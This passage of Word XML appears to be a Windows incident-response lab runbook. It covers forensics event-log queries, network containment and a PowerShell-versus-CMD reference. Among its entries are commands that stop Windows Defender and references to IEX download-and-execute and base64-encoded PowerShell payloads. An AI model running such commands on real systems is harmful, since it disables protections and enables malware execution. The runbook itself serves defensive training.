                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sc.exe stop </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F1922">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>WinDefend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3A9F0508" w14:textId="08BE5857" w:rsidR="003826D7" w:rsidRDefault="007F1922" w:rsidP="007F1922">
            <w:r w:rsidRPr="007F1922">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sc.exe start </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007F1922">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>WinDefend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
                <w:rtl/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
                <w:rtl/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Start-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MpScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00000000"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 w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ScanType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>FullScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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D5C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07C5" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>⚠ Re-enable Defender first</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>:  Set</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MpPreference</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> -DisableRealtimeMonitoring $false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="41DCCD0D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9E56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07777"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>14b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3FAA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(Run antivirus scan via Windows Security UI)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4D01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CMD </w:t>
            </w:r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D6BD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Alternative if command scan is slow — open Windows Security &gt; Virus &amp; threat protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="511A576C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54F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07777"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>15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9C58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Enable-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NetAdapter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-Name "*"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B069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A12F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Re-enables all network adapters after containment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="201645A1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B1C8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07777"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>16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46E8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netstat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ano</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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18DB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CMD </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="333333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7CF2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 xml:space="preserve">Monitor for 24h — verify port </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4444 does not reappear</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="75F2693E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F2C1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007777"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>16b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919C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Get-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NetTCPConnection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-State Established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C9B0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51BD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Cleaner view of active connections — check for suspicious IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FBC6875" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="27180A38" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A5C0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A0030F0" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>SECTION 7 — Phase 5: Post-Incident &amp; Forensics</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64623855" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Investigate, document, and </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>report  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Steps 17 – 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="604CCB0D" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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12"/>
        <w:gridCol w:w="4819"/>
        <w:gridCol w:w="1247"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="75BCBACA" w14:textId="77777777"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27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A136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27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9F9B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27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FB6A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Where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27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DFE1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Prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="26653C20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C17B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227700"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>17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6D50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Get-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WinEvent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FilterHashtable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1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@{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>LogName='System'; ID=104}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89E6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35DE" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>⚠ Requires Event Log service running — see note below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="02BFCBE4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4D20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227700"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>17b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92A0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Get-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WinEvent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FilterHashtable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1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@{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>LogName='Security'; ID=1102}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E156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7894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Detects Security log cleared — sign of anti-forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="6819AC60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A2B4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227700"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>18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81B3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Get-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WinEvent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FilterHashtable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1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@{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 xml:space="preserve">LogName='Security'; ID=4624} | Select-Object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TimeCreated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Message | Format-List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843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4506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Successful logon events — check for unauthorized access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="3DD25562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DDBB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227700"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>18b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1645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Get-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WinEvent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FilterHashtable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1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@{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>LogName='Security'; ID=4672}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058C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9357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Special privilege logon — admin token impersonation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="64259840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764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227700"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>18c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6E4A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Get-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WinEvent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FilterHashtable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1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@{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>LogName='Security'; ID=4625}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E752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17D8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Failed logon attempts — brute force indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="056298F8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="56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C6D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227700"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481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D5B0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.\ir_investigation.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247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818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FFFFFF"/>
                <w:sz w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="005A9E"/>
              </w:rPr>
              <w:t xml:space="preserve">PS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="005A9E"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> Admin</w:t>
            </w:r>
            <w:proofErr w:type="gram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E18D" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Collects all artifacts and saves ZIP report to C:\IR_Report_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>*.zip  —</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> run from Project </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Depi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32932528" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="2D614FC4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="FFA500"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="FFA500"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="FFA500"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="FFA500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0538CF" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Get</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WinEvent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> requires the Windows Event Log service to be running.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Check:    Get-Service </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EventLog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Start it: Start-Service </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EventLog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="603000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>Also requires Administrator privileges to read the Security log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="093DE1A1" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="2B6CE3A2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="5C440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605A5A5" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>SECTION 8 — Commands Requiring Extra Setup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B081B5" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Install or configure these BEFORE running the command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B658064" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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18"/>
        <w:gridCol w:w="2551"/>
        <w:gridCol w:w="4649"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="2787B985" w14:textId="77777777"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3B31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Command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AAFD9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You Need</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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0AF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How to Install / Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="6A3B2EFC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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F7D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806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Suspend-Process</w:t>
            </w:r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A263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ProcessEx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PowerShell module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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7B0B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CMD </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="0D823419" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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592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806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Start-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MpScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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24AD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Windows Defender must be re-enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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F642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CMD </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="5EEEAEE1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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48B2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806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WinEvent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Security)</w:t>
            </w:r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B58B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Admin + Event Log service running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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9061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CMD </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="0492715E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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DF2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806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Invoke-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WebRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (*.ps1)</w:t>
            </w:r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C1B2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ExecutionPolicy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Unrestricted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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CFA2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CMD </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="66305B23" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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CBD7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806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IEX(...) payload</w:t>
            </w:r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9C6B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ExecutionPolicy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Unrestricted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="464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A03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CMD </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="4A5D49CC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="198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4E24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806000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>.\ir_investigation.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255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A1A7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Must run from correct directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4649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770F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shd w:val="clear" w:color="auto" w:fill="333333"/>
              </w:rPr>
              <w:t xml:space="preserve"> CMD </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77E4FEA8" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="61BCFD52" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A2B3C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70A7449" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>QUICK REFERENCE — PowerShell vs CMD Summary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571BD4BB" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Which terminal runs which commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A4F2881" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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484"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="2B2DCE2D" w14:textId="77777777"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9E0D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Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="74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339D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Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="3D9A4D6D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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5A69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1A3A5C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CMD (Admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="748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1B40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sc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netsh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, reg, wmic,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tasklist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taskkill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dir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del, netstat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="3E473824" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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2D01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1A3A5C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PowerShell (Admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="748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7A79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Set-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MpPreference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Add-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MpPreference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Set-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ExecutionPolicy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Set-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NetFirewallProfile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Disable-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NetAdapter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Enable-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NetAdapter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New-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NetFirewallRule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Get-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FileHash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Get-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CimInstance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Get-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WinEvent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Get-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NetTCPConnection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Start-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MpScan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Invoke-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WebRequest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, Suspend-Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="385695FC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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A228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1A3A5C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PowerShell (no Admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="748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B3A4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Get-Item (file size check)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="388E749B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="170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C49A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1A3A5C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CMD or PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="748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42E7" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>powershell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 xml:space="preserve"> -Enc &lt;BASE64</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt;  (</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>one-liner payload)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="120EEC19" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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2C3C" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1A3A5C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>GUI only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7484" w:type="dxa"/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D009" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Windows Security antivirus scan (alternative to Start-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MpScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61843440" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D56BCB" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
